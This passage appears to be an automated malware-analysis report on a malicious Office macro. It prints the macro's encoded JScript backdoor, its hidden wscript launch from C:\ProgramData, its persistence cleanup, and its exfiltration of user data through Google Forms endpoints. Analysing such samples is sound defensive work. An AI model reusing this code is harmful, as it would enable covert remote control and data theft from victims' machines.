375	f = f & "EJhc2U2NC5kZWNvZGUoY21iX29iLmMpOwkJCQkJCQkJDQoJCQkJCQkJCWlmKGNvZF9kYXRhID09"
376	f = f & "ICJkZWxldGVCb3QiKWRlc3Ryb3koKTsNCg0KCQkJCQkJCQl2YXIgdGVtcG5hbWUxID0gIkxhbkN"
377	f = f & "yYWREcml2ZXIuaW5pIjsNCgkJCQkJCQkJdmFyIHRlbXBuYW1lMiA9ICJMYW5DcmFkRHJpdmVyLn"
378	f = f & "ZicyI7DQoJCQkJCQkJCXZhciB0bXBQYXRoID0gV3NoU2hlbGwuRXhwYW5kRW52aXJvbm1lbnRTd"
379	f = f & "HJpbmdzKCIlQUxMVVNFUlNQUk9GSUxFJVxcVHJhbnNiYXNlT2RiY0RyaXZlciIpOw0KCQkJCQkJ"
380	f = f & "CQl2YXIgdGVtcGF0aDEgPSB0bXBQYXRoICsgIlxcIit0ZW1wbmFtZTE7DQoJCQkJCQkJCXZhciB"
381	f = f & "0ZW1wYXRoMiA9IHRtcFBhdGggKyAiXFwiK3RlbXBuYW1lMjsNCgkJCQkJCQkJDQoJCQkJCQkJCX"
382	f = f & "ZhciBmID0gRlNPLk9wZW5UZXh0RmlsZSh0ZW1wYXRoMSwyLGZhbHNlLC0xKTsNCgkJCQkJCQkJZ"
383	f = f & "i5Xcml0ZShjb2RfZGF0YSk7DQoJCQkJCQkJCWYuQ2xvc2UoKTsNCiAgICAgICAgICAgICAgICAg"
384	f = f & "ICAgICAgICAgICAgICAgDQoJCQkJCQkJCVdTY3JpcHQuU2xlZXAoNTAwMCk7DQoJCQkJCQkJCVd"
385	f = f & "zaFNoZWxsLlJ1bignY21kLmV4ZSAvayB3c2NyaXB0LmV4ZSAiJyArIHRlbXBhdGgyICsgJyInLD"
386	f = f & "AsZmFsc2UpOwkNCgkJCQkJCQl9CQkJCQkJCQ0KCQkJCQkJfWVsc2V7DQoJCQkJCQkJTG9nKCJHZ"
387	f = f & "XRDb21tYW5kOjoiICsgIm5vIGV4ZWN0Iik7DQoJCQkJCQl9CQkJCQkNCiAgICAgICAgICAgICAg"
388	f = f & "ICB9IGNhdGNoIChlKSB7DQogICAgICAgICAgICAgICAgICAgICAgICBMb2coIkdldENvbW1hbmQ"
389	f = f & "6OiIgKyBlLmRlc2NyaXB0aW9uKTsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgIH0NCiANCi"
390	f = f & "AgICAgICAgZnVuY3Rpb24gZ2V0UmFuZG9tSW50KG1pbiwgbWF4KSB7DQogICAgICAgICAgICAgI"
391	f = f & "CAgcmV0dXJuIE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIChtYXggLSBtaW4gKyAxKSkgKyBt"
392	f = f & "aW47DQogICAgICAgIH0NCiANCiAgICAgICAgZnVuY3Rpb24gR2V0U2NyaXB0RGlyKCkgew0KICA"
393	f = f & "gICAgICAgICAgICAgIHJldHVybiBHZXRTY3JpcHRGdWxsUGF0aCgpLnJlcGxhY2UoL1teXFxdKy"
394	f = f & "QvZywgIiIpOw0KICAgICAgICB9DQogDQogICAgICAgIGZ1bmN0aW9uIEdldFNjcmlwdEZ1bGxQY"
395	f = f & "XRoKCkgew0KICAgICAgICAgICAgICAgIGlmIChHbG9iYWxPYmplY3QubG9jYXRpb24gJiYgR2xv"
396	f = f & "YmFsT2JqZWN0LmxvY2F0aW9uLmhyZWYpIHJldHVybiB1bmVzY2FwZShsb2NhdGlvbi5ocmVmLnJ"
397	f = f & "lcGxhY2UoL14uK1wvXC9cLy8sICIiKS5yZXBsYWNlKC9cLy9nLCAiXFwiKSk7DQogICAgICAgIC"
398	f = f & "AgICAgICAgaWYgKEdsb2JhbE9iamVjdC5XU2NyaXB0KSByZXR1cm4gV1NjcmlwdC5TY3JpcHRGd"
399	f = f & "WxsTmFtZTsNCiAgICAgICAgICAgICAgICByZXR1cm4gIiI7DQogICAgICAgIH0NCiANCiAgICAg"
400	f = f & "ICAgZnVuY3Rpb24gSFRNTFBhcnNlKGNvZGUsIGRvbnRfcHJldmVudF9jb2RlX2V4ZWMpIHsNCiA"
401	f = f & "gICAgICAgICAgICAgICB0cnkgew0KICAgICAgICAgICAgICAgICAgICAgICAgdmFyIGRvY3VtZW"
402	f = f & "50ID0gbmV3IEFjdGl2ZVhPYmplY3QoIkhUTUxGaWxlIik7DQogICAgICAgICAgICAgICAgICAgI"
403	f = f & "CAgICBpZiAoIWRvbnRfcHJldmVudF9jb2RlX2V4ZWMpIGRvY3VtZW50LmRlc2lnbk1vZGUgPSAi"
404	f = f & "b24iOw0KICAgICAgICAgICAgICAgICAgICAgICAgZG9jdW1lbnQud3JpdGUoY29kZSk7DQogICA"
405	f = f & "gICAgICAgICAgICAgICAgICAgICBkb2N1bWVudC5jbG9zZSgpOw0KICAgICAgICAgICAgICAgIC"
406	f = f & "AgICAgICAgaWYgKCFkb250X3ByZXZlbnRfY29kZV9leGVjKSBkb2N1bWVudC5leGVjQ29tbWFuZ"
407	f = f & "Cgic3RvcCIpOw0KICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGRvY3VtZW50LnBhcmVu"
408	f = f & "dFdpbmRvdzsNCiAgICAgICAgICAgICAgICB9IGNhdGNoIChlKSB7DQogICAgICAgICAgICAgICA"
409	f = f & "gICAgICAgICBMb2coIkhUTUxQYXJzZTo6IiArIGUuZGVzY3JpcHRpb24pDQogICAgICAgICAgIC"
410	f = f & "AgICAgfTsNCiAgICAgICAgICAgICAgICByZXR1cm4ge307DQogICAgICAgIH0NCiANCiAgICAgI"
411	f = f & "CAgZnVuY3Rpb24gTG9nKHZhbHVlKSB7DQogICAgICAgICAgICAgICAgdmFsdWUgPSB2YWx1ZSB8"
412	f = f & "fCAiIjsNCgkJCQl2YWx1ZQ0KICAgICAgICAgICAgICAgIHZhbHVlID0gZ3VpZCArICIkJCQiICs"
413	f = f & "gYm90Y2xhc3MgKyAiOjoiICsgR2V0VXNlck5hbWUoKSArICI6OiIgKyBlbmNvZGVVUkkodmFsdW"
414	f = f & "UpOw0KCQkJCUxvZ0luZXQodmFsdWUsZm9ybWtleSxlbnRyeSk7DQogICAgICAgIH0NCiANCiAgI"
415	f = f & "CAgICAgZnVuY3Rpb24gRmlsZUV4aXN0cyhQYXRoKSB7DQogICAgICAgICAgICAgICAgUGF0aCA9"
416	f = f & "IFdzaFNoZWxsLkV4cGFuZEVudmlyb25tZW50U3RyaW5ncyhQYXRoKTsNCiAgICAgICAgICAgICA"
417	f = f & "gICByZXR1cm4gRlNPLkZvbGRlckV4aXN0cyhQYXRoKSB8fCBGU08uRmlsZUV4aXN0cyhQYXRoKT"
418	f = f & "sNCiAgICAgICAgfQ0KIA0KICAgICAgICBmdW5jdGlvbiBUZXh0RmlsZVJlYWQoUGF0aCkgew0KI"
419	f = f & "CAgICAgICAgICAgICAgIGlmICghUGF0aCkgcmV0dXJuICIiOw0KICAgICAgICAgICAgICAgIGlm"
420	f = f & "ICghRmlsZUV4aXN0cyhQYXRoKSkgcmV0dXJuICIiOw0KICAgICAgICAgICAgICAgIFBhdGggPSB"
421	f = f & "Xc2hTaGVsbC5FeHBhbmRFbnZpcm9ubWVudFN0cmluZ3MoUGF0aCk7DQogICAgICAgICAgICAgIC"
422	f = f & "AgaWYgKEZTTy5HZXRGaWxlKFBhdGgpLlNpemUgPT0gMCkgcmV0dXJuICIiOw0KICAgICAgICAgI"
423	f = f & "CAgICAgIHRyeSB7DQogICAgICAgICAgICAgICAgICAgICAgICB2YXIgU3RyZWFtID0gRlNPLk9w"
424	f = f & "ZW5UZXh0RmlsZShQYXRoLCAxLCAwLCAtMiksDQogICAgICAgICAgICAgICAgICAgICAgICAgICA"
425	f = f & "gICAgIFJlc3VsdCA9IFN0cmVhbS5SZWFkQWxsKCk7DQogICAgICAgICAgICAgICAgICAgICAgIC"
426	f = f & "BTdHJlYW0uQ2xvc2UoKTsNCiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiBSZXN1bHQ7D"
427	f = f & "QogICAgICAgICAgICAgICAgfSBjYXRjaCAoZSkgew0KICAgICAgICAgICAgICAgICAgICAgICAg"
428	f = f & "Ly9Mb2coIlRleHRGaWxlUmVhZDo6IiArIFBhdGggKyAiOjoiICsgZS5kZXNjcml0aW9uKTsNCiA"
429	f = f & "gICAgICAgICAgICAgICB9Ow0KICAgICAgICB9DQogDQogICAgICAgIGZ1bmN0aW9uIFRleHRGaW"
430	f = f & "xlQ3JlYXRlKFBhdGgpIHsNCiAgICAgICAgICAgICAgICB0cnkgew0KICAgICAgICAgICAgICAgI"
431	f = f & "CAgICAgICAgUGF0aCA9IFdzaFNoZWxsLkV4cGFuZEVudmlyb25tZW50U3RyaW5ncyhQYXRoKTsN"
432	f = f & "CiAgICAgICAgICAgICAgICAgICAgICAgIGlmIChGaWxlRXhpc3RzKFBhdGgpKSBGU08uRGVsZXR"
433	f = f & "lRmlsZShQYXRoLCB0cnVlKTsNCiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiBGU08uT3"
434	f = f & "BlblRleHRGaWxlKFBhdGgsIDIsIDEsIC0xKQ0KICAgICAgICAgICAgICAgIH0gY2F0Y2ggKGUpI"
435	f = f & "HsNCiAgICAgICAgICAgICAgICAgICAgICAgIExvZygiVGV4dEZpbGVDcmVhdGU6OiIgKyBlLmRl"
436	f = f & "c2NyaXB0aW9uKQ0KICAgICAgICAgICAgICAgIH07DQogICAgICAgICAgICAgICAgcmV0dXJuIG5"
437	f = f & "1bGw7DQogICAgICAgIH0NCiANCiAgICAgICAgZnVuY3Rpb24gR2VuZXJhdGVTdHJpbmcoTCkgew"
438	f = f & "0KICAgICAgICAgICAgICAgIGlmICghTCkgTCA9IDg7DQogICAgICAgICAgICAgICAgcmV0dXJuI"
439	f = f & "G5ldyBBY3RpdmVYT2JqZWN0KCJTY3JpcHRsZXQuVHlwZUxpYiIpLkd1aWQucmVwbGFjZSgvW15c"
440	f = f & "d10rL2csICIiKS5zbGljZSgwLCBMKTsNCiAgICAgICAgfQ0KIA0KICAgICAgICBmdW5jdGlvbiB"
441	f = f & "DcmVhdGVPYmplY3QoUHJvZ0lkKSB7DQogICAgICAgICAgICAgICAgcmV0dXJuIG5ldyBBY3Rpdm"
442	f = f & "VYT2JqZWN0KFByb2dJZCk7DQogICAgICAgIH0NCiANCiAgICAgICAgZnVuY3Rpb24gR2V0VXNlc"
443	f = f & "k5hbWUoKSB7DQogICAgICAgICAgICAgICAgdHJ5IHsNCiAgICAgICAgICAgICAgICAgICAgICAg"
444	f = f & "IHJldHVybiBDcmVhdGVPYmplY3QoIldTY3JpcHQuTmV0V29yayIpLlVzZXJOYW1lOw0KICAgICA"
445	f = f & "gICAgICAgICAgIH0gY2F0Y2ggKGUpIHsNCiAgICAgICAgICAgICAgICAgICAgICAgIExvZygiR2"
446	f = f & "V0VXNlck5hbWU6OiIgKyBlLmRlc2NyaXB0aW9uKTsNCiAgICAgICAgICAgICAgICAgICAgICAgI"
447	f = f & "HJldHVybiAiVW5rbm93biINCiAgICAgICAgICAgICAgICB9DQogICAgICAgIH0NCg0KICAgICAg"
448	f = f & "ICBmdW5jdGlvbiBnZXRMYXN0RXhlR29vZ0NtZCgpIHsNCgkJCXZhciByZWdWYWx1ZSA9IDA7DQo"
449	f = f & "JCQl0cnkgewkJCQ0KCQkJCXJlZ1ZhbHVlID0gV3NoU2hlbGwuUmVnUmVhZChrZXlQYXRoKTsNCg"
450	f = f & "kJCX0gY2F0Y2ggKGUpIHsNCgkJCQlzZXRMYXN0RXhlR29vZ0NtZChyZWdWYWx1ZSk7DQoJCQl9D"
451	f = f & "QoJCQlyZXR1cm4gcmVnVmFsdWU7DQogICAgICAgIH0NCiAgICAgICAgZnVuY3Rpb24gc2V0TGFz"
452	f = f & "dEV4ZUdvb2dDbWQocmVnVmFsdWUpIHsNCgkJCXRyeSB7CQkJDQoJCQkJV3NoU2hlbGwuUmVnV3J"
453	f = f & "pdGUoa2V5UGF0aCxyZWdWYWx1ZSwgIlJFR19TWiIpOwkJCQ0KCQkJfSBjYXRjaCAoZSkgew0KCQ"
454	f = f & "kJCXJldHVybiAtMTsNCgkJCX0NCgkJCXJldHVybiByZWdWYWx1ZTsJCQkJCQkNCiAgICAgICAgf"
455	f = f & "Q0KCQkNCgkJZnVuY3Rpb24gc0RPUzJXaW4oc1RleHQsIGJJbnNpZGVPdXQpIHsNCgkJICB2YXIg"
456	f = f & "YUNoYXJzZXRzID0gWyJ3aW5kb3dzLTEyNTEiLCAiY3A4NjYiXTsNCgkJICBzVGV4dCArPSAiIjs"
457	f = f & "NCgkJICBiSW5zaWRlT3V0ID0gYkluc2lkZU91dCA/IDEgOiAwOw0KCQkgIHdpdGggKG5ldyBBY3"
458	f = f & "RpdmVYT2JqZWN0KCJBRE9EQi5TdHJlYW0iKSkgeyANCgkJCXR5cGUgPSAyOyAvL0JpbmFyeSAxL"
459	f = f & "CBUZXh0IDIgKGRlZmF1bHQpIA0KCQkJbW9kZSA9IDM7IC8vUGVybWlzc2lvbnMgaGF2ZSBub3Qg"
460	f = f & "YmVlbiBzZXQgMCwgIFJlYWQtb25seSAxLCAgV3JpdGUtb25seSAyLCAgUmVhZC13cml0ZSAzLCA"
461	f = f & "gDQoJCQkvL1ByZXZlbnQgb3RoZXIgcmVhZCA0LCAgUHJldmVudCBvdGhlciB3cml0ZSA4LCAgUH"
462	f = f & "JldmVudCBvdGhlciBvcGVuIDEyLCAgQWxsb3cgb3RoZXJzIGFsbCAxNg0KCQkJY2hhcnNldCA9I"
463	f = f & "GFDaGFyc2V0c1tiSW5zaWRlT3V0XTsNCgkJCW9wZW4oKTsNCgkJCXdyaXRlVGV4dChzVGV4dCk7"
464	f = f & "DQoJCQlwb3NpdGlvbiA9IDA7DQoJCQljaGFyc2V0ID0gYUNoYXJzZXRzWzEgLSBiSW5zaWRlT3V"
465	f = f & "0XTsNCgkJCXJldHVybiByZWFkVGV4dCgpOw0KCQkgIH0NCgkJfQkJDQoNCgkJZnVuY3Rpb24gZG"
466	f = f & "VzdHJveSgpew0KCQkJdHJ5IHsNCgkJCQlXc2hTaGVsbC5SZWdEZWxldGUoIkhLRVlfQ1VSUkVOV"
467	f = f & "F9VU0VSXFxTb2Z0d2FyZVxcTWljcm9zb2Z0XFxXaW5kb3dzXFxDdXJyZW50VmVyc2lvblxcUnVu"
468	f = f & "XFxUcmFuc2Jhc2VPZGJjRHJpdmVyIik7CQkNCgkJCX1jYXRjaChlKXt9DQoNCgkJCXRyeSB7DQo"
469	f = f & "JCQkJV3NoU2hlbGwuUnVuKCdzY2h0YXNrcyAvZGVsZXRlIC90biAiU3lzQ2hlY2tzIiAvZicsID"
470	f = f & "AsIGZhbHNlKTsNCgkJCX1jYXRjaChlKXt9DQoNCgkJCXZhciBzdHJTY3JpcHREaXIgPSBXc2hTa"
471	f = f & "GVsbC5FeHBhbmRFbnZpcm9ubWVudFN0cmluZ3MoIiVBTExVU0VSU1BST0ZJTEUlXFxUcmFuc2Jh"
472	f = f & "c2VPZGJjRHJpdmVyIik7DQoJCQl2YXIgc3RyU2NyaXB0ID0gIiI7DQoJCQkNCgkJCXRyeSB7DQo"
473	f = f & "JCQkJc3RyU2NyaXB0ID0gV1NjcmlwdC5TY3JpcHRGdWxsTmFtZTsNCgkJCQlpZihGU08uRmlsZU"
474	f = f & "V4aXN0cyhzdHJTY3JpcHQpKXsgRlNPLkRlbGV0ZUZpbGUoc3RyU2NyaXB0LCB0cnVlKTsJfQ0KC"
475	f = f & "QkJfWNhdGNoKGUpe30JDQoNCgkJCXRyeSB7DQoJCQkJc3RyU2NyaXB0ID0gc3RyU2NyaXB0RGly"
476	f = f & "ICsgIlxcTGFuQ3JhZERyaXZlci5pbmkiOyANCgkJCQlpZihGU08uRmlsZUV4aXN0cyhzdHJTY3J"
477	f = f & "pcHQpKXsgRlNPLkRlbGV0ZUZpbGUoc3RyU2NyaXB0LCB0cnVlKTsJfQ0KCQkJfWNhdGNoKGUpe3"
478	f = f & "0JDQoJCQl0cnkgew0KCQkJCXN0clNjcmlwdCA9IHN0clNjcmlwdERpciArICJcXExhbkNyYWREc"
479	f = f & "ml2ZXIudmJzIjsgDQoJCQkJaWYoRlNPLkZpbGVFeGlzdHMoc3RyU2NyaXB0KSl7IEZTTy5EZWxl"
480	f = f & "dGVGaWxlKHN0clNjcmlwdCwgdHJ1ZSk7CX0NCgkJCX1jYXRjaChlKXt9CQ0KCQkJdHJ5IHsNCgk"
481	f = f & "JCQlzdHJTY3JpcHQgPSBzdHJTY3JpcHREaXIgKyAiXFxzdGFydGVyLnZicyI7IA0KCQkJCWlmKE"
482	f = f & "ZTTy5GaWxlRXhpc3RzKHN0clNjcmlwdCkpeyBGU08uRGVsZXRlRmlsZShzdHJTY3JpcHQsIHRyd"
483	f = f & "WUpOwl9DQoJCQl9Y2F0Y2goZSl7fQkNCgkJCXRyeSB7DQoJCQkJc3RyU2NyaXB0ID0gc3RyU2Ny"
484	f = f & "aXB0RGlyICsgIlxccGF0aGVyLnZicyI7IA0KCQkJCWlmKEZTTy5GaWxlRXhpc3RzKHN0clNjcml"
485	f = f & "wdCkpeyBGU08uRGVsZXRlRmlsZShzdHJTY3JpcHQsIHRydWUpOwl9DQoJCQl9Y2F0Y2goZSl7fQ"
486	f = f & "kNCgkJCXRyeSB7DQoJCQkJc3RyU2NyaXB0ID0gc3RyU2NyaXB0RGlyICsgIlxccGF0aGVyLmlua"
487	f = f & "SI7IA0KCQkJCWlmKEZTTy5GaWxlRXhpc3RzKHN0clNjcmlwdCkpeyBGU08uRGVsZXRlRmlsZShz"
488	f = f & "dHJTY3JpcHQsIHRydWUpOwl9DQoJCQl9Y2F0Y2goZSl7fQkNCgkJCQkJCQ0KCQkJV1NjcmlwdC5"
489	f = f & "RdWl0KCk7CQkJDQoJCX0JCQkNCn0NCg0KZnVuY3Rpb24gQ3JlYXRlRGlyKCl7DQoJdHJ5IHsNCg"
490	f = f & "kJdmFyIFdzaFNoZWxsID0gbmV3IEFjdGl2ZVhPYmplY3QoIldTY3JpcHQuU2hlbGwiKTsNCgkJd"
491	f = f & "mFyIGRpcnBhdGggPSBXc2hTaGVsbC5FeHBhbmRFbnZpcm9ubWVudFN0cmluZ3MoIiVBTExVU0VS"
492	f = f & "U1BST0ZJTEUlXFxUcmFuc2Jhc2VPZGJjRHJpdmVyIik7CQkNCgkJdmFyIEZTTyA9IFdTY3JpcHQ"
493	f = f & "uQ3JlYXRlT2JqZWN0KCJTY3JpcHRpbmcuRmlsZVN5c3RlbU9iamVjdCIpOyAJCQ0KCQlpZighRl"
494	f = f & "NPLkZvbGRlckV4aXN0cyhkaXJwYXRoKSl7DQoJCQlGU08uQ3JlYXRlRm9sZGVyKGRpcnBhdGgpO"
495	f = f & "w0KCQl9DQoJCXJldHVybiB0cnVlOw0KCX1jYXRjaChlKXt9DQoJcmV0dXJuIHRydWU7DQp9CQ0K"
496	f = f & "DQpmdW5jdGlvbiBnZXRQcm94eSgpew0KCXZhciBXc2hTaGVsbCA9IG5ldyBBY3RpdmVYT2JqZWN"
497	f = f & "0KCJXU2NyaXB0LlNoZWxsIik7DQoJDQoJdHJ5IHsNCgkJdmFyIFByb3h5RW5hYmxlID0gV3NoU2"
498	f = f & "hlbGwuUmVnUmVhZCgiSEtFWV9DVVJSRU5UX1VTRVJcXFNvZnR3YXJlXFxNaWNyb3NvZnRcXFdpb"
499	f = f & "mRvd3NcXEN1cnJlbnRWZXJzaW9uXFxJbnRlcm5ldCBTZXR0aW5nc1xcUHJveHlFbmFibGUiKTsN"
500	f = f & "CgkJaWYoUHJveHlFbmFibGUgPT0gMSl7DQoJCQl2YXIgUHJveHlTZXJ2ZXIgPSBXc2hTaGVsbC5"
501	f = f & "SZWdSZWFkKCJIS0VZX0NVUlJFTlRfVVNFUlxcU29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1"
502	f = f & "xcQ3VycmVudFZlcnNpb25cXEludGVybmV0IFNldHRpbmdzXFxQcm94eVNlcnZlciIpOw0KCQkJc"
503	f = f & "mV0dXJuIFByb3h5U2VydmVyOw0KCQl9ZWxzZXsNCgkJCXJldHVybiAiIjsNCgkJfQ0KCX0gY2F0"
504	f = f & "Y2ggKGUpIHsNCgkJcmV0dXJuICIiOw0KCX0JCQkNCn0NCg0KZnVuY3Rpb24gSW5ldFJlYWQodXJ"
505	f = f & "sKSB7DQoJCXZhciBkYXRhX3NhdGF1c19hcnIgPSBuZXcgT2JqZWN0KCk7DQoJCXRyeSB7DQoJCQ"
506	f = f & "kJdmFyIGh0dHBSZXEgPSBuZXcgQWN0aXZlWE9iamVjdCgiTXN4bWwyLlNlcnZlclhNTEhUVFAuN"
507	f = f & "i4wIik7DQoJCQkJaHR0cFJlcS5zZXRPcHRpb24oMiwgMTMwNTYpOyAvL1NYSF9TRVJWRVJfQ0VS"
508	f = f & "VF9JR05PUkVfQUxMX1NFUlZFUl9FUlJPUlMgPSAxMzA1NjsgIFNYSF9PUFRJT05fVVJMID0gLTE"
509	f = f & "NCgkJCQlodHRwUmVxLnNldFRpbWVvdXRzKDAsIDAsIDAsIDApOw0KCQkJCWh0dHBSZXEub3Blbi"
510	f = f & "giR0VUIiwgdXJsLCBmYWxzZSk7DQoJCQkJdmFyIHByb3ggPSBnZXRQcm94eSgpDQoJCQkJaWYoI"
511	f = f & "HByb3ggIT0gIiIpew0KCQkJCQlodHRwUmVxLnNldFByb3h5KDIsIHByb3gsICIiKTsNCgkJCQl9"
512	f = f & "CQkJCQ0KCQkJCWh0dHBSZXEuc2V0UmVxdWVzdEhlYWRlcigiVXNlci1hZ2VudCIsICJNb3ppbGx"
513	f = f & "hLzUuMCAoTGludXg7IFU7IEFuZHJvaWQgMi4zLjM7IHpoLXR3OyBIVEMgUHlyYW1pZCBCdWlsZC"
514	f = f & "9HUkk0MCkgQXBwbGVXZWJLaXQvNTMzLjEgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuM"
515	f = f & "CBNb2JpbGUgU2FmYXJpLzUzMy4xIik7DQoJCQkJaHR0cFJlcS5zZW5kKCk7DQoJCQkJLy9XU2Ny"
516	f = f & "aXB0LkVjaG8oaHR0cFJlcS5nZXRBbGxSZXNwb25zZUhlYWRlcnMoKSk7DQoJCQkJLy9XU2NyaXB"
517	f = f & "0LkVjaG8oaHR0cFJlcS5zdGF0dXMpOw0KCQkJCWRhdGFfc2F0YXVzX2Fyclsnc3RhdCddID0gaH"
518	f = f & "R0cFJlcS5zdGF0dXM7DQoJCQkJZGF0YV9zYXRhdXNfYXJyWyd0ZXh0J10gPSBodHRwUmVxLnJlc"
519	f = f & "3BvbnNlVGV4dDsNCgkJfSBjYXRjaCAoZSkgeyANCgkJCS8vV1NjcmlwdC5FY2hvKGh0dHBSZXEu"
520	f = f & "c3RhdHVzKTsNCgkJCWRhdGFfc2F0YXVzX2FyclsndGV4dCddID0gIiI7DQoJCQlkYXRhX3NhdGF"
521	f = f & "1c19hcnJbJ3N0YXQnXSA9ICIxMDAiOw0KCQl9Ow0KCQlyZXR1cm4gZGF0YV9zYXRhdXNfYXJyOw"
522	f = f & "0KfQ0KDQpmdW5jdGlvbiBMb2dJbmV0KHZhbHVlLGZvcm1rZXksZW50cnkpIHsNCgl0cnkgew0KC"
523	f = f & "Ql2YXIgaHR0cFJlcSA9IG5ldyBBY3RpdmVYT2JqZWN0KCJNc3htbDIuU2VydmVyWE1MSFRUUC42"
524	f = f & "LjAiKTsNCgkJaHR0cFJlcS5zZXRPcHRpb24oMiwgMTMwNTYpOyANCgkJaHR0cFJlcS5zZXRUaW1"
525	f = f & "lb3V0cygwLCAwLCAwLCAwKTsNCgkJdXJsID0gImh0dHBzOi8vZG9jcy5nb29nbGUuY29tL2Zvcm"
526	f = f & "1zL2QvIiArIGZvcm1rZXkgKyAiL2Zvcm1SZXNwb25zZSI7DQoJCWh0dHBSZXEub3BlbigiUE9TV"
527	f = f & "CIsIHVybCwgZmFsc2UpOw0KCQl2YXIgcHJveCA9IGdldFByb3h5KCkNCgkJaWYoIHByb3ggIT0g"
528	f = f & "IiIpew0KCQkJaHR0cFJlcS5zZXRQcm94eSgyLCBwcm94LCAiIik7DQoJCX0NCgkJaHR0cFJlcS5"
529	f = f & "zZXRSZXF1ZXN0SGVhZGVyKCJVc2VyLWFnZW50IiwgIk1vemlsbGEvNS4wIChMaW51eDsgVTsgQW"
530	f = f & "5kcm9pZCAyLjMuMzsgemgtdHc7IEhUQyBQeXJhbWlkIEJ1aWxkL0dSSTQwKSBBcHBsZVdlYktpd"
531	f = f & "C81MzMuMSAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIE1vYmlsZSBTYWZhcmkvNTMz"
532	f = f & "LjEiKTsNCgkJaHR0cFJlcS5zZXRSZXF1ZXN0SGVhZGVyKCJDb250ZW50LVR5cGUiLCAiYXBwbGl"
533	f = f & "jYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkIik7CQ0KCQlodHRwUmVxLnNlbmQoZW50cnkgKy"
534	f = f & "AiPSIgKyB2YWx1ZSk7DQoJfSBjYXRjaCAoZSkge30NCn0NCiANCmZ1bmN0aW9uIHNwbGl0KHN0c"
535	f = f & "iwgc2VwYXJhdG9yLCBsaW1pdCkgew0KCXN0ciA9IHN0ci5zcGxpdChzZXBhcmF0b3IpOw0KCWlm"
536	f = f & "KHN0ci5sZW5ndGggPD0gbGltaXQpIHJldHVybiBzdHI7DQoNCgl2YXIgcmV0ID0gc3RyLnNwbGl"
537	f = f & "jZSgwLCBsaW1pdCk7DQoJcmV0LnB1c2goc3RyLmpvaW4oc2VwYXJhdG9yKSk7DQoNCglyZXR1cm"
538	f = f & "4gcmV0Ow0KfQ0KDQpmdW5jdGlvbiBDVUlEKCl7DQoJdmFyIHNuID0gIjEiOw0KCXRyeSB7DQoJC"
539	f = f & "XZhciBGU08gPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmpl"
540	f = f & "Y3QiKTsgDQoJCXZhciBzdHJEcml2ZSA9IEZTTy5HZXREcml2ZU5hbWUoRlNPLkdldFNwZWNpYWx"
541	f = f & "Gb2xkZXIoMCkpOw0KCQl2YXIgRCA9IEZTTy5HZXREcml2ZShzdHJEcml2ZSk7DQoJCXNuID0gRC"
542	f = f & "5TZXJpYWxOdW1iZXI7DQoJfSBjYXRjaCAoZSkge30NCgl2YXIgcmVzdWx0ID0gQmFzZTY0LmVuY"
543	f = f & "29kZShzbi50b1N0cmluZygpKTsNCglyZXN1bHQgPSByZXN1bHQucmVwbGFjZSgvW15cd10rL2cs"
544	f = f & "ICIiKS5zbGljZSgwLCAyMCk7DQoJcmVzdWx0ID0gdXVpZCsiLiIrZ2lhYysiLiIrcmVzdWx0Ow0"
545	f = f & "KCXJldHVybiAJcmVzdWx0Ow0KfQ=="
547	Set sh = CreateObject("WScript.Shell")	CreateObject("WScript.Shell") executed
548	Dim FileNumber, figName, procID
549	Dim WorkPath as String
550	WorkPath = sh.ExpandEnvironmentStrings("%ALLUSERSPROFILE%")	IWshShell3.ExpandEnvironmentStrings("%ALLUSERSPROFILE%") -> C:\ProgramData executed
551	WorkPath = WorkPath & "\TransbaseOdbcDriver"
552	Dim statMkDir as Boolean
553	statMkDir = CreateDir(WorkPath)
554	If statMkDir Then
555	FileNumber = FreeFile	FreeFile
556	figName = WorkPath & "\TransbaseOdbcDriver.js"
557	Open figName For Output As # FileNumber
558	Print # FileNumber, AP6fuezipn4(f)
559	Close # FileNumber
560	procID = Shell("wscript " & figName, vbHide)	Shell("wscript C:\ProgramData\TransbaseOdbcDriver\TransbaseOdbcDriver.js",0) vbHide executed
561	Endif
563	End Sub

Function sendFormData, APIs: 9, Strings: 8, Number of lines: 30, Relevance: 52.03

APIs	Meta Information
CreateObject	CreateObject("MSXML2.XMLHTTP")
Number
Err
Open	IXMLHTTPRequest.Open("POST","https://docs.google.com/forms/d/1F1zY2cODJxkCCorfv42kif4mxDsZ__BpXourgrkCtyo/formResponse",False)
setRequestHeader	IXMLHTTPRequest.setRequestHeader("Content-Type","application/x-www-form-urlencoded")
Send
ReadyState
WaitForResponse
StatusText

Strings	Decrypted Strings
"1F1zY2cODJxkCCorfv42kif4mxDsZ__BpXourgrkCtyo"
"entry.766326787"
"MSXML2.XMLHTTP"
"POST"
"https://docs.google.com/forms/d/"
"Content-Type"
"application/x-www-form-urlencoded"
"OK"

Line	Instruction	Meta Information
138	Function sendFormData(Value as String) as Boolean
139	Dim formkey	executed
139	formkey = "1F1zY2cODJxkCCorfv42kif4mxDsZ__BpXourgrkCtyo"
140	Dim entry
140	entry = "entry.766326787"
141	Dim rc as Variant
142	On Error Resume Next
143	Dim HttpRequest as Object
144	Set HttpRequest = CreateObject("MSXML2.XMLHTTP")	CreateObject("MSXML2.XMLHTTP") executed
145	If Err.Number <> 0 Then	Number Err
146	sendFormData = False
147	Set HttpRequest = Nothing
148	Exit Function
149	Endif
150	On Error Goto EndNow
151	HttpRequest.Open "POST", "https://docs.google.com/forms/d/" & formkey & "/formResponse", False	IXMLHTTPRequest.Open("POST","https://docs.google.com/forms/d/1F1zY2cODJxkCCorfv42kif4mxDsZ__BpXourgrkCtyo/formResponse",False) executed
152	HttpRequest.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"	IXMLHTTPRequest.setRequestHeader("Content-Type","application/x-www-form-urlencoded") executed
153	HttpRequest.Send (entry & "=" & Value)	Send
154	If HttpRequest.ReadyState <> 4 Then	ReadyState
155	HttpRequest.WaitForResponse 30	WaitForResponse
156	Endif
